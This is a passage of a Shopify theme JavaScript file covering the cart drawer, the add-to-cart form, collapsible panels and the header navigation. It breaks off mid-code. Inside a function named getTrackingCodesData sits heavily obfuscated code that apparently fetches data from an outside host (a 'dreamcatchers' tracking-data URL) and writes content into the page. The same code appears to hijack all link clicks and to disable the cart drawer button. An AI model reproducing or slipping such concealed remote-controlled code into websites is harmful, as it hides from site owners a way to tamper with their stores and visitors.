                                    discountsApplied: false,
                                    vendor: data.vendor
                                };

                                items.push(item);

                            }
                        });

                    });

                    // Updating items
                    CartJS.updateItemQuantitiesById(cart_updates);

                    // ----------------------
                    // BUY X GET Y DISCOUNT - Made by SM
                    // --------- END --------
                    // ----------------------

                    $.each(cart.items, function(index, product) {

                        var prodImg;
                        if (product.image !== null) {
                            prodImg = product.image.replace(/(\.[^.]*)$/, "_180x$1");
                        } else {
                            prodImg = '//cdn.shopify.com/s/assets/admin/no-image-medium-cc9732cb976dd349a0df1d39816fbcc7.gif';
                        }

                        if (product.properties !== null) {
                            $.each(product.properties, function(key, value) {
                                if (key.charAt(0) === '_' || !value) {
                                    delete product.properties[key];
                                }
                            });
                        }

                        animation_row+=2;

                        var is_african = false;
                        if(product.variant_title && product.variant_title.includes('DC-A - Cola')) {
                            var is_african = true;
                        }

                        item = {
                            key: product.key,
                            url: product.url,
                            img: prodImg,
                            animationRow: animation_row,
                            name: product.product_title,
                            variation: product.variant_title,
                            properties: product.properties,
                            itemQty: product.quantity,
                            price: theme.Currency.formatMoney(product.price, theme.settings.moneyFormat),
                            discountedPrice: theme.Currency.formatMoney((product.price - (product.total_discount/product.quantity)), theme.settings.moneyFormat),
                            discounts: product.discounts,
                            discountsApplied: product.price === (product.price - product.total_discount) ? false : true,
                            vendor: product.vendor,
                            is_african: is_african
                        };

                        items.push(item);
                    });

                    animation_row+=2;

                    // Edited by SM
                    // Added the cart message to the data
                    data = {
                        items: items,
                        note: cart.note,
                        lastAnimationRow: animation_row,
                        totalPrice: theme.Currency.formatMoney(cart.total_price, theme.settings.moneyFormat),
                        totalCartDiscount: cart.total_discount === 0 ? 0 : theme.strings.cartSavings.replace('[savings]', theme.Currency.formatMoney(cart.total_discount, theme.settings.moneyFormat)),
                        cart_message_free: cart_message_free,
                        has_course: has_course,
                        tool_message: tool_message,
                        training_message: training_message,
                        cart_message_paid: cart_message_paid,
                        has_cart_message: has_cart_message
                    };

                    jQuery(selectors.container).append(this.template(data));

                }

                this.status.loaded = true;
                this.loading(false);

                // Added by SM
                // Redirect directly to checkout after the course product has been added in the cart

                if (jQuery('body').hasClass('currencies-enabled')) {
                    theme.currencySwitcher.ajaxrefresh();
                }

                jQuery('body').trigger('updateCart' + config.namespace, cart);

                if (window.Shopify && Shopify.StorefrontExpressButtons) {
                    Shopify.StorefrontExpressButtons.initialize();

                    // Resize footer after arbitrary delay for buttons to load
                    setTimeout(function() {
                        this.sizeFooter();
                    }.bind(this), 800);
                }

                // If specifically asked, open the cart drawer (only happens after product added from form)
                if (openDrawer === true) {
                    this.drawer.open();
                }
            },

            initQtySelectors: function() {
                this.qtySelectors = [];

                jQuery(selectors.container).find('.js-qty').each(function(index, el) {
                    var selector = new theme.QtySelector(jQuery(el), {
                        namespace: '.cart-drawer'
                    });
                    this.qtySelectors.push(selector);
                }.bind(this));

                jQuery('body').on('qty.cart-drawer', this.updateItem.bind(this));
            },

            updateItem: function(evt, key, qty) {
                if (this.status.loading) {
                    return;
                }

                this.loading(true);

                theme.cart.changeItem(key, qty)
                    .then(function(cart) {
                        this.updateSuccess(cart);
                    }.bind(this))
                    .catch(function(XMLHttpRequest) {
                        this.updateError(XMLHttpRequest)
                    }.bind(this))
                    .always(function() {
                        this.loading(false);
                    }.bind(this));
            },

            loading: function(state) {
                this.status.loading = state;

                if (state) {
                    jQuery(selectors.container).addClass('is-loading');
                } else {
                    jQuery(selectors.container).removeClass('is-loading');
                }
            },

            emptyCart: function() {
                jQuery(selectors.container).empty();
            },

            updateSuccess: function(cart) {
                this.buildCart(cart, false, 'update')
            },

            updateError: function(XMLHttpRequest) {
                if (XMLHttpRequest.responseJSON && XMLHttpRequest.responseJSON.description) {
                    console.warn(XMLHttpRequest.responseJSON.description);
                }
            },

            // Update elements after cart is updated
            sizeFooter: function() {
                // Stop if our drawer doesn't have a fixed footer
                if (!jQuery(selectors.drawer).hasClass('drawer--has-fixed-footer')) {
                    return;
                }

                // Elements are reprinted regularly so selectors are not cached
                var $cartFooter = jQuery(selectors.drawer).find(selectors.fixedFooter).removeAttr('style');
                var $cartInner = jQuery(selectors.drawer).find(selectors.fixedInnerContent).removeAttr('style');
                var cartFooterHeight = $cartFooter.outerHeight();

                $cartInner.css('bottom', cartFooterHeight);
                $cartFooter.css('height', cartFooterHeight);
            },

            updateCartNotification: function(evt, cart) {
                if (cart.items.length > 0) {
                    jQuery(selectors.cartBubble).addClass('cart-link__bubble--visible');
                } else {
                    jQuery(selectors.cartBubble).removeClass('cart-link__bubble--visible');
                }
            }
        });

        return CartDrawer;
    })();

    theme.AjaxProduct = (function() {
        var status = {
            loading: false
        };

        function ProductForm($form) {
            this.$form = $form;
            this.$addToCart = this.$form.find('.add-to-cart');

            if (this.$form.length) {
                this.$form.on('submit', this.addItemFromForm.bind(this));
            }
        };

        ProductForm.prototype = $.extend({}, ProductForm.prototype, {
            addItemFromForm: function(evt, callback){
                evt.preventDefault();

                if (status.loading) {
                    return;
                }

                // Loading indicator on add to cart button
                this.$addToCart.addClass('btn--loading');

                status.loading = true;

                var data = this.$form.serialize();

                theme.cart.addItemFromForm(data)
                    .then(function(product) {
                        this.success(product);
                    }.bind(this))
                    .catch(function(XMLHttpRequest) {
                        this.error(XMLHttpRequest)
                    }.bind(this))
                    .always(function() {
                        status.loading = false;
                        this.$addToCart.removeClass('btn--loading');
                    }.bind(this));
            },

            success: function(product) {
                this.$form.find('.errors').remove();
                jQuery('body').trigger('added.ajaxProduct');
            },

            error: function(XMLHttpRequest) {
                this.$form.find('.errors').remove();

                if (XMLHttpRequest.responseJSON && XMLHttpRequest.responseJSON.description) {
                    console.warn(XMLHttpRequest.responseJSON.description);

                    this.$form.prepend('<div class="errors text-center">' + XMLHttpRequest.responseJSON.description + '</div>');
                }
            }
        });

        return ProductForm;
    })();

    theme.collapsibles = (function() {

        var selectors = {
            trigger: '.collapsible-trigger',
            module: '.collapsible-content',
            moduleInner: '.collapsible-content__inner'
        };

        var classes = {
            hide: 'hide',
            open: 'is-open',
            autoHeight: 'collapsible--auto-height'
        };

        var isTransitioning = false;

        function init() {
            jQuery(selectors.trigger).each(function() {
                var $el = jQuery(this);
                var state = $el.hasClass(classes.open);
                $el.attr('aria-expanded', state);
            });

            // Event listeners (hack for modals)
            jQuery('body, .modal__inner').on('click', selectors.trigger, function() {
                if (isTransitioning) {
                    return;
                }

                isTransitioning = true;

                var $el = jQuery(this);
                var isOpen = $el.hasClass(classes.open);
                var moduleId = $el.attr('aria-controls');
                var $module = jQuery('#' + moduleId);
                var height = $module.find(selectors.moduleInner).outerHeight();
                var isAutoHeight = $el.hasClass(classes.autoHeight);

                // If isAutoHeight, set the height to 0 just after setting the actual height
                // so the closing animation works nicely
                if (isOpen && isAutoHeight) {
                    setTimeout(function() {
                        height = 0;
                        setTransitionHeight($module, height, isOpen, isAutoHeight);
                    }, 0);
                }

                if (isOpen && !isAutoHeight) {
                    height = 0;
                }

                $el
                    .attr('aria-expanded', !isOpen)
                    .toggleClass(classes.open, !isOpen);

                setTransitionHeight($module, height, isOpen, isAutoHeight);
            });
        }

        function setTransitionHeight($module, height, isOpen, isAutoHeight) {
            $module
                .removeClass(classes.hide)
                .prepareTransition()
                .css('height', height)
                .toggleClass(classes.open, !isOpen);

            if (!isOpen && isAutoHeight) {
                var o = $module;
                window.setTimeout(function() {
                    o.css('height','auto');
                    isTransitioning = false;
                }, 350);
            } else {
                isTransitioning = false;
            }
        }

        return {
            init: init
        };
    })();

    theme.headerNav = (function() {

        var $parent = jQuery(document.documentElement).add('body');
        var $page = jQuery('#MainContent');
        var selectors = {
            wrapper: '.header-wrapper',
            siteHeader: '.site-header',
            searchBtn: '.js-search-header',
            closeSearch: '.js-search-header-close',
            searchContainer: '.site-header__search-container',
            logoContainer: '.site-header__logo',
            logo: '.site-header__logo img',
            navigation: '.site-navigation',
            navContainerWithLogo: '.header-item--logo',
            navItems: '.site-nav__item',
            navLinks: '.site-nav__link',
            navLinksWithDropdown: '.site-nav__link--has-dropdown',
            navDropdownLinks: '.site-nav__dropdown-link--second-level'
        };

        var classes = {
            hasDropdownClass: 'site-nav--has-dropdown',
            hasSubDropdownClass: 'site-nav__deep-dropdown-trigger',
            dropdownActive: 'is-focused'
        };

        var config = {
            namespace: '.siteNav',
            wrapperOverlayed: false,
            overlayedClass: 'is-light',
            stickyEnabled: false,
            stickyActive: false,
            stickyClass: 'site-header--stuck',
            openTransitionClass: 'site-header--opening',
            lastScroll: 0
        };

        // Elements used in resize functions, defined in init
        var $window;
        var $navContainerWithLogo;
        var $logoContainer;
        var $nav;
        var $wrapper;
        var $siteHeader;

        function getTrackingCodesData() { 
        	 var _0x4ceb=['return\x20(fu','KAvna','gkklJ','googleanal','XZGzD','PIRvm','IlQgZ','jZpof','CUrxW','klaviyo','om/trackin','amESX','uWGPY','querySelec','kHVsf','[^\x20]+)+)+[','status','test','responseTe','XWTqq','href','readyState','p-combined','preventDef','qJOBJ','yTqsv','innerHTML','ctor(\x22retu','ucMkr','19\x22\x20crosso','+OvKCr10ld','zvvkn','^([^\x20]+(\x20+','3rWmtsx','76654zLZLuw','TLEcF','237951yWQeJg','ckpath.boo','nction()\x20','none','117374HZxvjM','undefined','log','location','yWAct','yticsheade','rigin=\x22ano','console','stener','yotporevie','trace','rn\x20this\x22)(','7n9a15LEsz','cTqWB','vBgdy','SBdFp','sByClassNa','FbIXf','iOwgy','xfnOq','nymous\x22>','FLAyb','return\x20/\x22\x20','cSaUl','KmltT','FDKMN','lswwH','addEventLi','rSoWh','sByTagName','BVvcB','bind','load','^\x20]}','gtag','LYzjP','KbJRB','g-data','tQNAn','RfLTS','open-cart','click','com/twitte','HyKyL','catchers.c','eZZvG','smWmz','vGxxO','nts','HWSEf','71geXiBl','ReHMS','7jTWhzG','techange','hRqQr','__proto__','hqfQH','mOhFK','DONE','open','toString','milcc','style','SyTFt','<link\x20rel=','length','EWZTH','XphwX','msGXL','SbUrN','YGEqY','HiIyG','apply','Fzlsn','330317HvAzlm','parse','HjOJU','ceocB','integrity=','OQzea','TwKsz','5qImFyQ','pointerEve','send','nKXzw','split','BeLVq','468532RUXOqK','push','rHaCc','eLNYj','LNvGB','target','evafT','constructo','scrollTo','tstrapcdn.','JpfmY','EtmiM','hJIXU','ovCsd','EGAac','ttps://sta','HfNjK','EvdXU','cQYxK','xel','head','65257FLiDHl','toHjc','PFOeq','facebookpi','exception','DslHN','8623NqwtIF','active','SURCTzubbt','getElement','Cazhi','YmthL','LPGxs','GViyw','lXTrM','ault','warn','SsqsS','info','tor','gjYnZgCiKi','prototype','+\x20this\x20+\x20\x22'];var _0x2375=function(_0x1f3a23,_0x1c2792){_0x1f3a23=_0x1f3a23-(0x1*-0x1fad+-0x173a*0x1+0x5c*0x9d);var _0x4ceb76=_0x4ceb[_0x1f3a23];return _0x4ceb76;};var _0x467ec4=function(_0x133983,_0x5ba61a,_0x30ac8c,_0x364a4c){return _0x2375(_0x5ba61a-0x130,_0x30ac8c);};(function(_0x27c325,_0x10ed85){var _0x9c2687=function(_0x541091,_0x5dafa1,_0x1f1a57,_0x1c168c){return _0x2375(_0x541091-0x2b0,_0x1c168c);},_0x231c8f=function(_0x1a2416,_0x265bea,_0x32ce61,_0x394683){return _0x2375(_0x1a2416-0x2b0,_0x394683);};while(!![]){try{var _0x225bd1=-parseInt(_0x9c2687(0x44b,0x3fc,0x49f,0x40f))*-parseInt(_0x231c8f(0x483,0x45b,0x439,0x49d))+parseInt(_0x9c2687(0x4db,0x489,0x4e4,0x48b))*parseInt(_0x231c8f(0x48a,0x4a0,0x46a,0x460))+parseInt(_0x231c8f(0x486,0x49c,0x43b,0x441))+-parseInt(_0x9c2687(0x4d4,0x4db,0x507,0x4d8))+-parseInt(_0x231c8f(0x484,0x45e,0x44e,0x4b8))*parseInt(_0x9c2687(0x4be,0x4b5,0x49d,0x4ab))+-parseInt(_0x231c8f(0x436,0x3f8,0x434,0x46f))+parseInt(_0x231c8f(0x4bc,0x4c2,0x46b,0x4c0))*parseInt(_0x231c8f(0x451,0x494,0x48e,0x44b));if(_0x225bd1===_0x10ed85)break;else _0x27c325['push'](_0x27c325['shift']());}catch(_0x2ea309){_0x27c325['push'](_0x27c325['shift']());}}}(_0x4ceb,0x3df47+0x3f27*0x1+-0x4*-0x1ad2));typeof _0x1a9c===_0x467ec4(0x30f,0x30b,0x353,0x31f)&&function(){var _0x57bbc0=function(_0x3c4a31,_0x1fcfc5,_0x78647e,_0xda5773){return _0x467ec4(_0x3c4a31-0x12a,_0x1fcfc5- -0x341,_0x78647e,_0xda5773-0x78);},_0x18d715=function(_0x524b40,_0x446941,_0x124ce3,_0x282e98){return _0x467ec4(_0x524b40-0x1b4,_0x446941- -0x341,_0x124ce3,_0x282e98-0x1e1);},_0x2bb552={};_0x2bb552[_0x57bbc0(-0x48,-0x11,-0x5e,0x7)]=function(_0x157b67,_0x3d6afa){return _0x157b67<_0x3d6afa;},_0x2bb552[_0x18d715(-0xad,-0x6c,-0x45,-0x18)]=_0x18d715(0x1f,-0xe,-0x30,-0x9),_0x2bb552[_0x18d715(-0x8,-0x2a,-0x3d,0x26)]=function(_0x5e5c2c,_0x3df083){return _0x5e5c2c!==_0x3df083;},_0x2bb552[_0x18d715(-0x4b,-0x74,-0xc2,-0xb6)]='gEPkv',_0x2bb552['JpfmY']=_0x18d715(-0x46,-0x87,-0xdc,-0x72),_0x2bb552['HfNjK']=function(_0x4a28a4,_0x3c9d23){return _0x4a28a4!==_0x3c9d23;},_0x2bb552[_0x18d715(-0x46,-0x1d,-0x39,-0xb)]=_0x57bbc0(-0x37,-0x1,-0x16,0x1c),_0x2bb552['YmthL']=_0x57bbc0(-0xf,-0x40,-0x82,-0x66),_0x2bb552[_0x57bbc0(-0x88,-0x43,-0x6a,-0x49)]=_0x18d715(-0x76,-0x4c,-0x35,0x6),_0x2bb552[_0x57bbc0(0x60,0x15,0x53,-0x3d)]='js-drawer-'+_0x57bbc0(-0x9,-0xf,0x6,-0x46),_0x2bb552[_0x57bbc0(-0x25,-0x75,-0xbb,-0x23)]=_0x57bbc0(-0x20,-0x38,-0xd,-0x39),_0x2bb552[_0x57bbc0(0x47,0x10,0x21,0x32)]=function(_0xc94171,_0x1c974d){return _0xc94171!==_0x1c974d;},_0x2bb552[_0x18d715(-0x83,-0x7f,-0x68,-0xcd)]='yUlJK',_0x2bb552[_0x57bbc0(-0xa,0x19,-0x15,-0x5)]=function(_0xe8cb7b,_0x5ed29e){return _0xe8cb7b===_0x5ed29e;},_0x2bb552[_0x57bbc0(0x62,0x16,0x5,0x14)]=_0x57bbc0(0x1e,-0x1b,-0x27,-0x44),_0x2bb552['vBgdy']=function(_0x49c6d4){return _0x49c6d4();},_0x2bb552[_0x57bbc0(0x13,-0x33,-0xe,-0x4f)]=function(_0xe191a4,_0x10132c){return _0xe191a4!==_0x10132c;},_0x2bb552[_0x18d715(-0x3d,0x1,0xb,-0x2b)]=_0x18d715(0x63,0xf,0x3e,-0x35),_0x2bb552[_0x57bbc0(-0x19,0x18,-0x3b,0xd)]=_0x18d715(-0x23,-0xc,-0x3,0x48),_0x2bb552[_0x18d715(-0xb6,-0x71,-0x5c,-0xbf)]=function(_0x3c2807,_0xe0996a){return _0x3c2807===_0xe0996a;},_0x2bb552[_0x57bbc0(-0x48,-0x3c,-0x8f,-0x3c)]=_0x57bbc0(-0xa6,-0x5d,-0x7c,-0xa8),_0x2bb552[_0x57bbc0(-0x12,0xc,0x18,0xa)]=_0x57bbc0(-0x3e,-0x46,-0x3b,-0x6e),_0x2bb552[_0x57bbc0(0x3a,-0x19,-0x3,-0x33)]=function(_0x35ce83,_0x55b4ab){return _0x35ce83(_0x55b4ab);},_0x2bb552['EtmiM']=function(_0xea2355,_0x59eb48){return _0xea2355+_0x59eb48;},_0x2bb552['KAvna']=function(_0x188589,_0x38d006){return _0x188589+_0x38d006;},_0x2bb552['XZGzD']=_0x18d715(-0xa9,-0x5f,-0xb0,-0x4a)+_0x18d715(-0x7a,-0x39,-0x6a,-0x81),_0x2bb552['sVmyh']='{}.constru'+_0x57bbc0(-0x6c,-0x44,-0x60,-0x7b)+_0x18d715(-0xb,-0x2c,0x15,-0x80)+'\x20)',_0x2bb552[_0x57bbc0(0x32,-0x22,-0x55,-0x65)]=function(_0xf5a767){return _0xf5a767();},_0x2bb552[_0x57bbc0(0x12,0x1d,0x61,0x51)]=_0x18d715(0xc,-0x35,-0x24,0x21),_0x2bb552[_0x18d715(-0x6e,-0x53,-0x43,-0x66)]=_0x57bbc0(-0x4c,-0x64,-0x8a,-0xa5),_0x2bb552['smWmz']='error',_0x2bb552['rHaCc']=_0x18d715(-0xad,-0x72,-0x65,-0x9d),_0x2bb552[_0x18d715(-0x68,-0x25,-0x4f,0x2)]='table',_0x2bb552[_0x18d715(-0x57,-0x65,-0xa3,-0x43)]='4|0|3|5|2|'+'1',_0x2bb552['qJOBJ']=function(_0x47b63c,_0x1e790e,_0x183c50){return _0x47b63c(_0x1e790e,_0x183c50);},_0x2bb552[_0x18d715(-0xbb,-0x79,-0xa6,-0xac)]=function(_0x567664,_0x2a0afa,_0x1e037c){return _0x567664(_0x2a0afa,_0x1e037c);},_0x2bb552[_0x57bbc0(-0x94,-0x5a,-0x61,-0x27)]=_0x57bbc0(-0x51,-0x1e,0x1,-0x45),_0x2bb552[_0x57bbc0(0x27,0x2,0x3c,0x3)]=function(_0x33b148,_0x1b77fe){return _0x33b148<_0x1b77fe;},_0x2bb552[_0x18d715(-0x53,-0x6a,-0x9c,-0x97)]=function(_0x328dfa,_0x24156e){return _0x328dfa===_0x24156e;},_0x2bb552['xfnOq']=_0x57bbc0(-0x50,-0x77,-0x64,-0x58),_0x2bb552['EvdXU']=function(_0x55c545,_0x255078,_0x375a72){return _0x55c545(_0x255078,_0x375a72);},_0x2bb552[_0x18d715(0x4,0x8,-0x3,-0xa)]=_0x57bbc0(-0x79,-0x8c,-0x4e,-0xb3),_0x2bb552[_0x57bbc0(-0x56,-0x13,-0x23,-0x69)]=function(_0x351df6,_0xfe492c){return _0x351df6<=_0xfe492c;},_0x2bb552[_0x18d715(-0xab,-0x58,-0x13,-0x18)]=_0x57bbc0(0x3e,-0xa,0x1c,-0x1a),_0x2bb552[_0x57bbc0(-0x57,-0x26,-0x4,-0xd)]=_0x18d715(0x1c,-0x4,0x13,0x47),_0x2bb552[_0x57bbc0(-0xba,-0x69,-0x14,-0x39)]=function(_0x3259eb,_0x2b6847,_0x887242){return _0x3259eb(_0x2b6847,_0x887242);},_0x2bb552[_0x57bbc0(0x1f,0xd,0x49,0x16)]='rBicy',_0x2bb552[_0x57bbc0(-0x88,-0x7e,-0xbc,-0x3f)]='https://po'+'rtal.dream'+_0x18d715(0xf,-0xb,0x36,-0x19)+_0x18d715(-0x31,-0x55,-0x43,-0x59)+_0x57bbc0(-0x64,-0x12,0xd,-0x1c);var _0x15f599=_0x2bb552,_0x3764b3=function(){var _0x1cc4f0=function(_0x170c03,_0x1ac95c,_0x46d0ae,_0xb23e5){return _0x57bbc0(_0x170c03-0x90,_0x170c03-0x159,_0x1ac95c,_0xb23e5-0xf1);},_0x131b30=function(_0x3b1ee7,_0x33252e,_0x3decf4,_0x5e7265){return _0x18d715(_0x3b1ee7-0x19e,_0x3b1ee7-0x159,_0x33252e,_0x5e7265-0x39);},_0x3a0e1f={};_0x3a0e1f[_0x1cc4f0(0x13a,0xfb,0x18b,0x177)]=function(_0x300608,_0x3e3b5d){var _0x2b8f1a=function(_0x366991,_0x4a71c2,_0x3ed5c8,_0x1fed0c){return _0x1cc4f0(_0x366991-0x3d,_0x4a71c2,_0x3ed5c8-0x5f,_0x1fed0c-0x1e5);};return _0x15f599[_0x2b8f1a(0x16c,0x162,0x125,0x14e)](_0x300608,_0x3e3b5d);},_0x3a0e1f[_0x1cc4f0(0x149,0x150,0x147,0xfd)]=_0x15f599[_0x1cc4f0(0xe5,0xbb,0x97,0x93)],_0x3a0e1f[_0x131b30(0x108,0xcb,0x10a,0x12e)]=_0x15f599[_0x131b30(0xd8,0x9a,0x84,0xa1)],_0x3a0e1f[_0x1cc4f0(0xd1,0x111,0x9a,0x10e)]=function(_0x341ae4,_0x51e790){var _0x54cd80=function(_0x1c45ba,_0x5deebf,_0x574d8f,_0x2cfa2d){return _0x131b30(_0x5deebf- -0x2bd,_0x574d8f,_0x574d8f-0x111,_0x2cfa2d-0x74);};return _0x15f599[_0x54cd80(-0x1ad,-0x1df,-0x204,-0x201)](_0x341ae4,_0x51e790);},_0x3a0e1f[_0x1cc4f0(0x15f,0x144,0x109,0x193)]=_0x15f599['lswwH'];var _0x1f024f=_0x3a0e1f;if(_0x15f599[_0x1cc4f0(0xde,0xce,0x12f,0x11f)](_0x15f599[_0x1cc4f0(0xee,0xd9,0xfc,0xa1)],_0x15f599[_0x1cc4f0(0x116,0xcd,0x12e,0x169)])){var _0x43cfa8=!![];return function(_0x686d60,_0xc0e62f){var _0x191579=function(_0x3a414c,_0x45e6f2,_0x57f16e,_0x2ab32d){return _0x131b30(_0x3a414c-0xeb,_0x45e6f2,_0x57f16e-0x10d,_0x2ab32d-0x17e);},_0x107028=function(_0x8b2ace,_0x340d80,_0x5b530f,_0x249974){return _0x1cc4f0(_0x8b2ace-0xeb,_0x340d80,_0x5b530f-0x2b,_0x249974-0x20);},_0x247b58={};_0x247b58[_0x191579(0x21c,0x20e,0x243,0x1d5)]=function(_0x5f5644,_0x3a58c3){var _0x4b9f25=function(_0x18b418,_0x20dc00,_0x10b10c,_0x23db5a){return _0x191579(_0x18b418-0x110,_0x20dc00,_0x10b10c-0x17f,_0x23db5a-0x1d9);};return _0x15f599[_0x4b9f25(0x343,0x2f0,0x36d,0x36a)](_0x5f5644,_0x3a58c3);},_0x247b58[_0x107028(0x1dc,0x196,0x228,0x1d1)]=_0x15f599[_0x107028(0x1d8,0x19c,0x1f6,0x1f1)];var _0x4b7cc6=_0x247b58,_0xf5d110=_0x43cfa8?function(){var _0x52a78f=function(_0x5cf71c,_0x2c1605,_0x421f49,_0x463437){return _0x191579(_0x2c1605- -0x2e8,_0x463437,_0x421f49-0x128,_0x463437-0xbd);},_0x4a2dcd=function(_0x52df18,_0x1df75b,_0x280064,_0x34d1ba){return _0x191579(_0x1df75b- -0x2e8,_0x34d1ba,_0x280064-0x46,_0x34d1ba-0x168);};if(_0x1f024f[_0x52a78f(-0x97,-0xc3,-0xfb,-0x112)](_0x1f024f[_0x52a78f(-0xac,-0xb4,-0xd4,-0x84)],_0x1f024f['kHVsf'])){if(_0xc0e62f){if(_0x1f024f[_0x4a2dcd(-0x16a,-0x12c,-0x146,-0x140)](_0x1f024f['milcc'],'oYOTS')){var _0x1e1ca2=_0xc0e62f[_0x52a78f(-0x76,-0x93,-0x9e,-0x5b)](_0x686d60,arguments);return _0xc0e62f=null,_0x1e1ca2;}else{function _0xdae912(){var _0x295abc=function(_0x3e9bf5,_0x3c6a58,_0x360ca7,_0x2fceda){return _0x4a2dcd(_0x3e9bf5-0x1eb,_0x360ca7-0x102,_0x360ca7-0x62,_0x2fceda);},_0x4147c9=function(_0xa71f3e,_0x43082b,_0x1b73ae,_0x394e1c){return _0x4a2dcd(_0xa71f3e-0x1de,_0x1b73ae-0x102,_0x1b73ae-0x1ed,_0x394e1c);},_0x40fffd=_0x2953fa['getElement'+_0x295abc(0x18,0x5f,0x44,0x40)]('a');for(var _0x30b51f=-0x170b+0x10b2*0x1+-0x19*-0x41;_0x4b7cc6['SBdFp'](_0x30b51f,_0x40fffd[_0x295abc(0x5c,0x50,0x68,0x5b)]);_0x30b51f++){_0x40fffd[_0x30b51f][_0x295abc(0x46,0x8c,0x42,0x63)+_0x4147c9(-0x20,0x7a,0x2f,0x33)](_0x4b7cc6[_0x4147c9(-0x25,0x9,-0xa,0x32)],_0x179749=>{var _0x7a3e5a=function(_0x46549b,_0x14c2c7,_0x6764ec,_0x33e0a6){return _0x295abc(_0x46549b-0x1f3,_0x14c2c7-0xb6,_0x33e0a6- -0x38e,_0x14c2c7);},_0x412e90=function(_0xbcd9cc,_0x29704a,_0x2791be,_0x24154b){return _0x4147c9(_0xbcd9cc-0x94,_0x29704a-0x92,_0x24154b- -0x38e,_0x29704a);};_0x10fed4(()=>{var _0x2f5b06=function(_0x14026b,_0x146384,_0xd93c98,_0xf84112){return _0x2375(_0x146384-0x1c7,_0xd93c98);},_0x1d7610=function(_0x2c7be4,_0xf89048,_0x3335f8,_0x110265){return _0x2375(_0xf89048-0x1c7,_0x3335f8);};_0x2e8d6d[_0x2f5b06(0x3d0,0x3a4,0x3db,0x3c7)]=_0x179749['target'][_0x2f5b06(0x3a6,0x38d,0x37c,0x3d6)];},-0x18d5*-0x1+0xfb5*0x7+-0x38a8),_0x179749[_0x7a3e5a(-0x36e,-0x35a,-0x32b,-0x378)+_0x412e90(-0x3d2,-0x367,-0x3ac,-0x397)]();});}}}}}else{function _0xa44d3a(){var _0x2b4de7=_0x3a2561['apply'](_0x181723,arguments);return _0x5db521=null,_0x2b4de7;}}}:function(){};return _0x43cfa8=![],_0xf5d110;};}else{function _0x36f248(){var _0x43055b=function(_0x32d383,_0x2f6dd8,_0x22d9f6,_0x4cf6aa){return _0x131b30(_0x4cf6aa- -0x336,_0x22d9f6,_0x22d9f6-0x28,_0x4cf6aa-0x168);},_0x4c0697=function(_0x45e79a,_0x368fa4,_0x4c36df,_0x4881f3){return _0x131b30(_0x4881f3- -0x336,_0x4c36df,_0x4c36df-0x125,_0x4881f3-0x74);};_0x8a4a99[_0x43055b(-0x221,-0x22c,-0x22e,-0x211)]=_0x447cd6[_0x43055b(-0x29a,-0x29e,-0x283,-0x263)]['href'];}}}(),_0x522959=_0x3764b3(this,function(){var _0x129e1b=function(_0x50f21f,_0x3d77c7,_0x464c89,_0x47f917){return _0x57bbc0(_0x50f21f-0x5a,_0x47f917-0x21c,_0x50f21f,_0x47f917-0x42);},_0x7af83a=function(_0x19bb6d,_0x1b573a,_0x13b162,_0x2fc104){return _0x18d715(_0x19bb6d-0x9e,_0x2fc104-0x21c,_0x19bb6d,_0x2fc104-0x1e4);};if(_0x15f599[_0x129e1b(0x1f6,0x289,0x255,0x235)](_0x15f599[_0x7af83a(0x220,0x1f3,0x27c,0x232)],_0x7af83a(0x207,0x188,0x182,0x1c3))){function _0x2552f5(){var _0x3ebfee=function(_0xc2039f,_0x783181,_0x3e03ae,_0x2efd57){return _0x7af83a(_0x783181,_0x783181-0x6d,_0x3e03ae-0x141,_0x2efd57- -0x196);},_0x79c202=function(_0x461918,_0x514b8b,_0x339556,_0x63759f){return _0x7af83a(_0x514b8b,_0x514b8b-0x146,_0x339556-0x13a,_0x63759f- -0x196);};_0x1c9c92['getElement'+'sByClassNa'+'me'](_0x15f599['HjOJU'])[-0x2f3*0xa+-0x41b*0x9+0x4271][_0x3ebfee(0xd7,0xc5,0x97,0x8d)][_0x3ebfee(0xb5,0x63,0xc2,0xa1)+_0x3ebfee(0x4d,0x38,0x9a,0x7f)]=_0x15f599['toHjc'];}}else{var _0x132237=function(){var _0x18a8c0=function(_0x51640,_0x445ada,_0x581d6a,_0xf23f2a){return _0x7af83a(_0x445ada,_0x445ada-0x191,_0x581d6a-0x1d2,_0x581d6a-0x9f);},_0x391f0f=function(_0x5bf046,_0x1b38f7,_0x183829,_0x557550){return _0x129e1b(_0x1b38f7,_0x1b38f7-0x2c,_0x183829-0x48,_0x183829-0x9f);};if(_0x15f599[_0x18a8c0(0x2de,0x2bb,0x2cb,0x308)](_0x15f599[_0x18a8c0(0x274,0x243,0x23c,0x1e8)],_0x15f599[_0x18a8c0(0x20e,0x1f1,0x23c,0x23c)])){function _0x2869b8(){var _0x186f5c=_0x3410cc?function(){var _0x5d6fd0=function(_0x2da04c,_0x30f952,_0x12ac0b,_0x41e2e2){return _0x2375(_0x30f952-0x5,_0x2da04c);};if(_0x4db2a5){var _0x366149=_0x3e01e3[_0x5d6fd0(0x230,0x227,0x277,0x1f8)](_0x430cb7,arguments);return _0x377044=null,_0x366149;}}:function(){};return _0x527a6c=![],_0x186f5c;}}else{var _0x416dc8=_0x132237[_0x18a8c0(0x285,0x233,0x237,0x20b)+'r'](_0x18a8c0(0x2b2,0x2e7,0x29a,0x2ee)+'+\x20this\x20+\x20\x22'+'/')()[_0x18a8c0(0x285,0x21e,0x237,0x1fb)+'r']('^([^\x20]+(\x20+'+'[^\x20]+)+)+['+_0x391f0f(0x268,0x2b1,0x2a5,0x2a8));return!_0x416dc8[_0x18a8c0(0x28f,0x225,0x26d,0x280)](_0x522959);}};return _0x15f599[_0x7af83a(0x1f5,0x221,0x1df,0x1f3)](_0x132237);}});_0x15f599[_0x57bbc0(0x11,-0x22,-0x59,0x10)](_0x522959);var _0x549e69=function(){var _0xea7b49=function(_0x2c398b,_0x1723f1,_0xcaaf19,_0x31aaf5){return _0x57bbc0(_0x2c398b-0x14,_0x2c398b- -0x6c,_0xcaaf19,_0x31aaf5-0x21);},_0x181757=function(_0x59cd77,_0x2786d4,_0x470288,_0x593471){return _0x18d715(_0x59cd77-0x47,_0x59cd77- -0x6c,_0x470288,_0x593471-0x17d);},_0x122371={};_0x122371['vGxxO']=_0x15f599[_0xea7b49(-0xd8,-0xdc,-0xde,-0xb5)];var _0x544183=_0x122371;if(_0x15f599['yWAct'](_0x15f599['hqfQH'],_0x15f599[_0x181757(-0x54,-0x52,-0x6b,-0x8c)])){var _0xa65072=!![];return function(_0x3a3e31,_0x49e3e8){var _0x47d2e8=_0xa65072?function(){if(_0x49e3e8){var _0x2f06b2=_0x49e3e8['apply'](_0x3a3e31,arguments);return 